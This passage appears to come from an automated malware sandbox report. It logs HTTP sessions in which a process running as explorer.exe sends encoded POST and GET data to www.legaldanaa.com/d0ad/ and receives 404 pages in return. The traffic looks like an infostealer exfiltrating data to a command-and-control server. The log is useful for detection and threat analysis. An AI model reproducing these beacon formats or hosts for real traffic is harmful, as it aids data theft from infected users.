3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
105	192.168.11.20	49950	198.252.105.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:13.657840014 CEST	2183	OUT	POST /d0ad/ HTTP/1.1 Host: www.legaldanaa.com Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.legaldanaa.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.legaldanaa.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 74 55 70 30 73 55 58 37 54 51 35 71 32 70 46 7a 78 69 56 63 50 49 51 78 4c 48 55 6d 41 74 42 39 44 49 6c 31 7a 76 4a 32 6c 67 61 4c 78 4c 77 58 6a 4d 78 54 71 63 51 77 68 6a 69 6c 73 64 37 73 4f 59 6b 33 4f 67 57 56 6b 37 54 54 64 77 38 77 32 6f 49 77 66 30 7e 37 36 32 38 47 68 47 32 5a 4e 5a 4d 50 57 43 7a 59 61 6b 51 45 74 4d 74 77 7e 4c 6d 61 48 38 70 4c 7e 58 31 42 54 46 61 6e 33 74 6d 71 66 70 6e 4e 70 32 6d 56 47 38 28 51 34 33 65 2d 6c 79 66 67 32 75 58 37 64 7a 48 4f 71 45 44 6f 71 50 55 35 59 43 42 43 62 4d 66 70 68 67 56 54 61 78 6c 65 44 50 4d 42 6f 59 59 77 57 4c 56 54 4b 75 46 7a 44 54 68 42 54 4e 39 48 62 6b 55 51 49 34 72 45 56 74 6e 47 79 4c 48 31 39 4d 46 45 50 76 7e 4a 43 6b 76 7a 58 58 42 46 34 39 4d 4a 6d 76 48 4d 59 6e 64 33 6e 2d 6c 4e 6f 79 72 68 7e 43 39 6f 6e 7a 6f 6b 50 6e 39 52 63 54 57 36 7a 77 53 77 5a 59 68 4c 75 67 64 78 5a 6f 52 45 77 37 4d 33 79 68 7e 59 42 69 74 75 34 37 49 55 43 4c 31 6e 71 35 63 56 69 48 5a 4e 35 54 41 42 5a 52 70 74 73 7a 4d 31 63 4f 30 5a 7a 68 69 69 52 49 41 50 48 4d 44 66 61 4f 38 33 43 37 6e 46 52 67 4c 6a 4e 5a 6b 59 58 4d 73 41 59 38 7a 75 6b 4e 50 45 67 78 64 77 41 71 57 4b 6f 67 56 64 74 52 74 38 46 6e 33 38 37 6e 54 6f 6f 37 49 68 59 38 41 66 70 58 31 6d 41 41 49 4f 74 58 56 59 70 64 79 6a 79 6a 4c 32 6e 7a 51 30 59 52 66 67 49 5f 54 52 6e 62 46 6f 36 38 4d 67 42 72 76 64 77 32 4d 34 71 79 46 6f 36 49 51 2d 53 70 4f 59 75 46 31 7a 72 41 6c 62 78 68 64 4a 32 73 34 51 59 44 5a 31 6d 6d 67 7a 64 30 65 50 30 55 63 2d 4d 39 6c 64 31 6a 37 71 37 6f 78 63 36 39 34 65 51 74 38 64 57 53 46 4e 68 63 4c 75 39 36 66 58 75 48 37 69 57 54 4c 61 68 5a 35 6d 4b 32 55 4c 58 6b 36 72 41 37 61 50 5a 47 68 67 38 38 51 31 4b 50 7a 39 6d 4d 6d 47 53 70 38 65 79 43 6b 5a 6e 65 45 6f 56 45 42 31 61 74 4d 76 52 6f 34 2d 4d 30 57 44 4b 32 4d 61 66 6a 7e 6d 69 48 75 53 50 77 4f 45 55 35 77 73 77 72 36 77 57 62 61 39 79 35 4c 6e 49 4a 66 6d 28 6f 31 79 6a 46 79 6f 77 63 46 6a 33 39 4a 2d 28 59 61 67 67 7a 6b 36 68 48 4b 48 46 54 4a 38 75 47 71 2d 4a 4c 4c 6f 6c 55 35 72 32 50 48 59 57 5f 5a 6d 4e 79 75 30 75 53 37 43 77 57 75 78 47 36 70 43 4c 64 37 7a 48 59 28 44 4b 39 6c 6c 36 2d 42 41 53 31 66 6d 45 56 34 33 66 42 50 34 71 32 54 35 76 63 39 4c 65 68 32 4c 79 78 5a 58 6a 55 4e 56 65 34 56 4e 54 38 6b 43 73 61 65 46 4f 68 62 69 78 66 78 31 78 34 49 70 75 50 79 76 77 30 6d 4a 76 38 68 68 58 54 6d 33 79 6f 68 6e 32 31 43 55 75 54 48 72 35 6b 51 45 6a 7a 39 39 4a 54 77 43 59 7a 51 35 46 5f 42 62 54 63 51 5a 6f 4d 5a 6e 6b 6b 50 34 63 57 44 7a 49 42 4f 4b 43 31 67 35 76 65 4e 5a 67 7a 57 5f 72 70 6c 73 28 4c 4f 50 71 6e 6d 55 51 55 4d 52 46 71 33 58 42 48 4d 5f 67 53 51 37 43 51 64 61 54 48 39 6d 42 77 6f 38 4d 78 49 5f 6e 4c 55 4b 48 75 69 5f 59 77 6a 30 57 36 61 6c 31 63 59 4f 69 46 69 6e 4a 68 66 41 31 46 36 52 38 71 6d 75 32 54 63 66 67 78 56 4e 33 4c 41 53 6f 66 52 4e 62 31 72 67 59 65 56 6a 63 49 76 2d 36 70 64 4c 41 67 50 5f 37 79 42 45 30 57 38 54 43 66 47 6a 4c 66 70 53 44 6b 34 39 52 4b 57 57 6f 74 50 35 62 4a 39 69 39 59 41 58 35 4b 66 6f 74 51 62 44 57 64 51 71 33 56 6a 35 4c 2d 47 4d 47 62 75 63 74 53 63 69 32 6a 57 50 7e 64 64 36 71 47 72 56 71 44 4f 6d 6d 4d 63 6d 7a 75 6a 33 58 58 63 35 56 79 50 78 6b 71 6c 79 54 69 56 45 61 41 4a 59 71 39 4b 55 4d 79 6b 70 6c 76 38 70 56 56 4e 4b 43 6b 74 64 50 68 41 62 63 47 79 44 7e 74 6b 45 72 48 61 46 61 71 38 43 53 78 4f 41 46 48 70 66 32 2d 34 58 69 49 7e 72 70 67 6c 56 55 53 41 58 41 49 31 65 79 79 53 5f 35 64 4d 73 66 6f 71 63 7a 44 33 5a 78 61 38 54 45 4c 70 7a 39 35 50 6c 72 4f 75 57 42 62 31 62 31 48 49 50 50 4d 74 53 6d 56 32 4f 79 46 70 54 4e 41 37 57 43 74 7e 47 6e 6e 36 48 74 77 61 6e 6b 35 51 76 4d 44 44 6c 4b 42 34 4d 69 69 39 68 55 57 42 72 48 34 48 41 75 4f 6b 79 48 50 47 76 55 61 39 69 4f 45 32 7a 4d 37 73 45 67 6f 56 69 56 39 36 4f 7a 78 59 5a 5a 4c 69 58 65 78 4d 76 6e 55 50 50 6f 7a 5a 4b 70 67 45 56 4e 74 73 6e 71 55 48 4f 35 5f 34 53 77 64 47 4f 5a 53 69 56 36 42 41 64 47 55 74 56 67 61 6c 62 6f 49 4d 4a 74 32 79 64 38 6d 77 74 52 38 4f 6f 70 5f 53 70 48 5a 4e 36 47 48 55 65 76 6f 67 4f 63 71 33 Data Ascii: jXu=tUp0sUX7TQ5q2pFzxiVcPIQxLHUmAtB9DIl1zvJ2lgaLxLwXjMxTqcQwhjilsd7sOYk3OgWVk7TTdw8w2oIwf0~7628GhG2ZNZMPWCzYakQEtMtw~LmaH8pL~X1BTFan3tmqfpnNp2mVG8(Q43e-lyfg2uX7dzHOqEDoqPU5YCBCbMfphgVTaxleDPMBoYYwWLVTKuFzDThBTN9HbkUQI4rEVtnGyLH19MFEPv~JCkvzXXBF49MJmvHMYnd3n-lNoyrh~C9onzokPn9RcTW6zwSwZYhLugdxZoREw7M3yh~YBitu47IUCL1nq5cViHZN5TABZRptszM1cO0ZzhiiRIAPHMDfaO83C7nFRgLjNZkYXMsAY8zukNPEgxdwAqWKogVdtRt8Fn387nToo7IhY8AfpX1mAAIOtXVYpdyjyjL2nzQ0YRfgI_TRnbFo68MgBrvdw2M4qyFo6IQ-SpOYuF1zrAlbxhdJ2s4QYDZ1mmgzd0eP0Uc-M9ld1j7q7oxc694eQt8dWSFNhcLu96fXuH7iWTLahZ5mK2ULXk6rA7aPZGhg88Q1KPz9mMmGSp8eyCkZneEoVEB1atMvRo4-M0WDK2Mafj~miHuSPwOEU5wswr6wWba9y5LnIJfm(o1yjFyowcFj39J-(Yaggzk6hHKHFTJ8uGq-JLLolU5r2PHYW_ZmNyu0uS7CwWuxG6pCLd7zHY(DK9ll6-BAS1fmEV43fBP4q2T5vc9Leh2LyxZXjUNVe4VNT8kCsaeFOhbixfx1x4IpuPyvw0mJv8hhXTm3yohn21CUuTHr5kQEjz99JTwCYzQ5F_BbTcQZoMZnkkP4cWDzIBOKC1g5veNZgzW_rpls(LOPqnmUQUMRFq3XBHM_gSQ7CQdaTH9mBwo8MxI_nLUKHui_Ywj0W6al1cYOiFinJhfA1F6R8qmu2TcfgxVN3LASofRNb1rgYeVjcIv-6pdLAgP_7yBE0W8TCfGjLfpSDk49RKWWotP5bJ9i9YAX5KfotQbDWdQq3Vj5L-GMGbuctSci2jWP~dd6qGrVqDOmmMcmzuj3XXc5VyPxkqlyTiVEaAJYq9KUMykplv8pVVNKCktdPhAbcGyD~tkErHaFaq8CSxOAFHpf2-4XiI~rpglVUSAXAI1eyyS_5dMsfoqczD3Zxa8TELpz95PlrOuWBb1b1HIPPMtSmV2OyFpTNA7WCt~Gnn6Htwank5QvMDDlKB4Mii9hUWBrH4HAuOkyHPGvUa9iOE2zM7sEgoViV96OzxYZZLiXexMvnUPPozZKpgEVNtsnqUHO5_4SwdGOZSiV6BAdGUtVgalboIMJt2yd8mwtR8Oop_SpHZN6GHUevogOcq3LjApf(zhWRyEXAu9prGI4zU8bHNoDbfxMlIRHftnI8vMTW4Hovth6uQy0gaQ30Dys3ATFbYbq1t5112VoOQuSrXAurPEAsVu5XTBqeL4YixKwz_ZcKP62fbHG1KaoMqX8J_McrczVIq75BtgwAXyRQKpYtsuKquPAUbzIrgysC81NpkOTCvi6FvvfxIZsjl(p6wWtApL-ybnRMBLqOYwEzYMg5FE-7Dvu5gRjo9qkI4iJs1lcnFWeQY3Vvbn0N8R44Xk9in6WI6Oa6ySIos49EQIHkleiQZUJ19tNkIjTpja43se2D3TcERoj2CsqPT7Atw4wdN4ymKnX7QoS9tsJmNZkRNg0Pks17qoOm4DsjMXdLLl3FxOlASbuM0YYidL308WlkRIqMMkmksGnpz3Md6uSidTHkqQOctgMT3uwVmQ_W8FNGXNbV_W-5LnvjueHRXMmpvaFD2u9tgKeTZlauG7gUiK0ZwXfCOJfoivkr_YTGLgfDb2Kdn1tEz(0sD~Km2FxtD45AE9zuPZHvCqQWResd6ESE5AgX19sYogTxWxlYDtREESyHeYCUJvKyNT66KIDY54HTrDX3hz2TgxWR4K-IcT3yftTBJAtt-LDCpyUEG6sRL4fzYLcXXsQ0K9PfVE7aySsEhRPuJKEACRsxMinLBJvkWVKouk9MXC10FQ7mXedrQP0x_oQJX4gu2WTlo2hxGjdU2CKhcNBjtN28GnaBEFL80pm3Hv3s6WHv04lAGtWIxnYzFUcfcnJsjEO1cKezaAuYkJEWMqpoNnJNPFO1xfoumt3sAg-LHpodHHpyTHfZQuo(YEktQ7dW6KASJcmBr0HavrthRbOzKcRo_VEEjnuPuVveB5-UAuOe59gzdAGPcGXZ6S1lfnwBpWKosAEIJ(eflRyFvC7lyAbcCMOxVm-Vj0TWIuKLiC2LnubLCBPDkmRJjk2pCgoHC5l116frHkpLSbssqkJcwH9YbTPMeDB5WIN5Z1Tm64o7rXuJIE6RngiD650itQIDd2mkBx9jXiL5uUe9n5JfunY6AznDC9koVG8oKkgfvRA4JtW7N9IS2rYmZsQFN4B2ZoIrBN3zZ58fDLc102hYoU6yOm7iQqEcSEezYjPuUa6FeQeEEUxaE6-CoDm7voyPKibEj4PqapBZkJMsUDiuCJJ1ugwclUPwAfpTT0BJFVOaBUXalC0Bk~xkobr3PBLsOKrfZpgyn(UdYBJv3MWqXbtQKtm8MPEmNfmNfwJmCqGFuKvtZdTMluZ(s0wzLZvAGTYufrXd3kiLdi-m97Na8(mgC88VHU1bhXifeAvCkNt9fP2NR(dzWE3CAMzVlLJ5PcKNRNQq5zUwjYuPrUn4jbhciM3R0esopLxR4VUHoOYwgwinAJpLxq2hoJrrCipVYUsDcqFa7sKhhyYWq7Nzd(X7AkElVJhanwWQDRbaKtdknFf9Y5Iv91A~rrwNWp6xrLT3n08na6UuJhEWgQIqYX4b8tddBNRL1pFx0qdHdF6~b0ySqbScceCcdepu_00QZn4KFFs43cXqySRgPHb5qJW4ypK9xbelHArwoJ6eOIZvhzl~cmMPc3F9XV9FVsbXuunaxC8TqFnNuDfl6YEwNN9p4TS22QVtbddDuHSc6eFxCxLyqs3fn2cdzq2YK02uR7Y9TGPw5ayNlGZTCwGcZTRdEJCwNeaKpVU2O0-xx~rJpSvIGAIaLpb9mpnez6-XyEAbjGVirvh6QECWnKRYYMFMNfFYzUMmE(v7HoQefaWPvmVTNkQiq8OUUUmw8Tp420nDJKBESPSXG7zfrzbj3zyRxrv9tJwrufkBpyHyihU8YQ4Dkti27~tOh8x5Ux2skadgvKX977P2079EWcrcel6Ga8Iw0eBvRdVl9(NwjRw43eBM5LUg-IEryJxeIgEv3faQZ13Sj7_aScHyRPCU_lh6OtJDclP3Ld39GJW5NbeX7DaNptOzmjNj9Hzm1Gn1sj3S3YaLnCgrI7O~A9aU2oOHFj4HRVqLbamKO3KCFfuHiGcY9bIkNkdP_hyM5f-EeP7UW9VGbhZgqh2UJcgvQ2DYDC1Ge17ATWCy0saRc8zw5r3AR2Vjw5IvSXHruZ6qQofwSsfJBF0OMemtZbVDYs4oF5KTCBEg0l3wkxjfeLbctBoOwhFz1hs4Osul1Ebbu71QYTRI34X~jXkOWygiHqjr6m_aC12ZiNd1f8Oddr5(pOX2wdc2u4zGJsvPlHZLbiFJxcsQbGIg2Nr7oVRFQ~-439SseHL6i4c78tONL3_POSaiwnP~F6EEl6KM2gqIDZPXcTIG97hiSME98tX5JapbKid(V6s42HT5NkDesEfkdNGqCVJYrTxn0o0Y7ssMiFwZNRdvlnx3SBA~qXVJ-AmoP3CZ6prEgpub89nV1XoxhM0n9v6t7T6VRGxFy4PJIYcS7Xk9RnTYki_8Bi5ICg6gOzBluoeDrjEflxjJ6SBJeHImv814Af9d7siNOamPdR-h-de4lRrVLBwwXQJiFwCxhQ-1JgsrgPB(B3gMoBI7lmlxn5eSpApr_aokgSyz5hwCFo0p4D0YfLQa3lMP_gp3sLHhAUdXvs8IIoouf94tXy9ZuvrJSfyKpDsM4BmOFW9oOooEUFnaZQbvakPkBV2kKRxyNq5dYZ8IXr1r5LuoVrluxtad-bUOULXl6mhGv3sKQWb7fCDZy(4QvIbWGO8W4EoC5KGgScDh5
Oct 26, 2022 13:21:13.657902956 CEST	2186	OUT	Data Raw: 57 34 4f 75 33 38 73 4b 64 50 5a 2d 43 34 59 41 52 4f 4c 48 28 33 47 61 77 39 32 77 76 4f 49 36 51 56 43 4f 36 63 71 78 79 37 63 67 6d 79 37 4c 6a 6c 51 73 43 4c 42 58 42 36 41 7a 79 33 4a 59 35 34 76 36 32 71 65 69 76 56 38 44 7a 31 62 44 4f 65 Data Ascii: W4Ou38sKdPZ-C4YAROLH(3Gaw92wvOI6QVCO6cqxy7cgmy7LjlQsCLBXB6Azy3JY54v62qeivV8Dz1bDOerE58WQOavV4Y7erchcvs3FGU~ddIiqF7MVL45LJyo8AwajpXHjsW0CRm8rbT9I2g8Ay2i9u8bjBuQnT0qGwr6DHk3Uv1FDV-gmWu6-u8YVMrhlCw4eEbizSxy1lVvPEWnjNPR-8S(AWYjeg9rC5b2ZKhIH9kL6qLg
Oct 26, 2022 13:21:13.786524057 CEST	2187	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 26 Oct 2022 11:21:13 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Oct 26, 2022 13:21:13.786652088 CEST	2190	OUT	Data Raw: 73 66 6d 76 39 6f 33 48 32 2d 63 46 42 68 71 55 56 61 48 5a 6a 73 32 44 42 6f 73 2d 79 61 28 70 4d 34 31 71 4e 32 4b 39 4e 55 41 76 49 75 73 71 56 48 41 7a 59 47 6c 47 51 4a 53 46 45 77 65 37 61 55 69 66 55 4d 4b 4d 70 2d 4d 4c 6c 71 75 72 61 4b Data Ascii: sfmv9o3H2-cFBhqUVaHZjs2DBos-ya(pM41qN2K9NUAvIusqVHAzYGlGQJSFEwe7aUifUMKMp-MLlquraKio(IdeMNipYf7ou-EjleRROo~RXWwB8CyDX5ncdiMpDjtOBU1gdDLZBUUGd_nTB8MvmkFWYG75JLcjL1(QuII9ToaTin555aN67bzJR4lUMs5_bg5OOT40uLEDYyzWb7QDXilNU-E0Q2SDNrG-30M1glo_ddpQmJ6
Oct 26, 2022 13:21:13.786729097 CEST	2191	OUT	Data Raw: 75 59 55 35 78 72 59 6a 73 31 65 50 31 65 49 64 61 42 55 47 7e 34 4d 43 58 33 56 4a 67 55 53 61 58 6c 52 77 37 55 79 6b 77 6f 35 48 77 4e 51 6b 76 36 6d 4b 46 71 74 78 34 47 49 75 4e 37 55 75 6c 6f 54 36 64 33 47 56 7a 79 72 34 76 70 49 5f 6a 6c Data Ascii: uYU5xrYjs1eP1eIdaBUG~4MCX3VJgUSaXlRw7Uykwo5HwNQkv6mKFqtx4GIuN7UuloT6d3GVzyr4vpI_jlbtblf2CYa1U0szrMB2ZyW18A5Zxp8W8BDeGZjxL7qOa09kIpgPc7PhSU(M0l7pFvdk~rnoNA~r2XqFuTfL05m5KVSsJ-hO5r64SPimKcH07ezBDz2nW8DmVzw-Ld6k54A8b5K2p8026TXDLhRjCTx3teAJzgycbd9
Oct 26, 2022 13:21:13.786789894 CEST	2198	OUT	Data Raw: 33 32 63 42 70 33 7a 33 34 6a 63 4f 4b 37 59 4d 58 47 65 63 53 4c 56 32 70 57 66 6f 4e 71 77 36 47 33 55 32 71 36 50 70 67 63 58 2d 56 35 51 49 7e 77 75 6c 49 4f 4a 74 57 6a 30 79 76 50 45 2d 41 67 45 46 39 6d 6f 74 43 45 72 4f 65 76 6a 42 61 66 Data Ascii: 32cBp3z34jcOK7YMXGecSLV2pWfoNqw6G3U2q6PpgcX-V5QI~wulIOJtWj0yvPE-AgEF9motCErOevjBafB7DV8BsgrmkW6mHCRjb-sk31UcLGbsN2T1sX70VjUVog5vvtqG2bQlULkpC3~D4AK6QrDp(t7sTw1r4Ns6U30qD3iW3a9qn-2csHdwZgPFiOg-qA7_xt6vsASW7h2kEQwQvqUwgsB9QizlviNrByPz74zrlNH_0Gf
Oct 26, 2022 13:21:13.786955118 CEST	2203	OUT	Data Raw: 6a 44 37 5a 68 36 39 58 6c 70 6c 45 39 4f 56 75 61 51 52 66 44 6d 52 4a 74 50 28 5a 7a 6d 76 6f 73 6a 31 51 7e 66 69 67 68 34 49 48 4f 32 6e 36 4b 57 4a 43 63 2d 43 6e 63 34 33 49 6c 38 4e 2d 39 7a 7e 54 72 33 71 33 55 59 43 38 78 77 59 79 4b 76 Data Ascii: jD7Zh69XlplE9OVuaQRfDmRJtP(Zzmvosj1Q~figh4IHO2n6KWJCc-Cnc43Il8N-9z~Tr3q3UYC8xwYyKvO3wasAxhxoI083tHNK~ONcCWYgzt8iEabqO9NjBBz3WVByKmRd6MtionsbyN0wd4gIb-x4NxNr(TEcZKCuXIejMic6~JrbKLV70NfiDsjwQRxWRRzJL93RgN3RZkivLEx2iH5LfZd14-0Mqvd0XvlzYMR4XTT3n42

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
106	192.168.11.20	49951	198.252.105.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:15.814035892 CEST	2204	OUT	GET /d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs HTTP/1.1 Host: www.legaldanaa.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:21:15.943078041 CEST	2205	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 26 Oct 2022 11:21:15 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
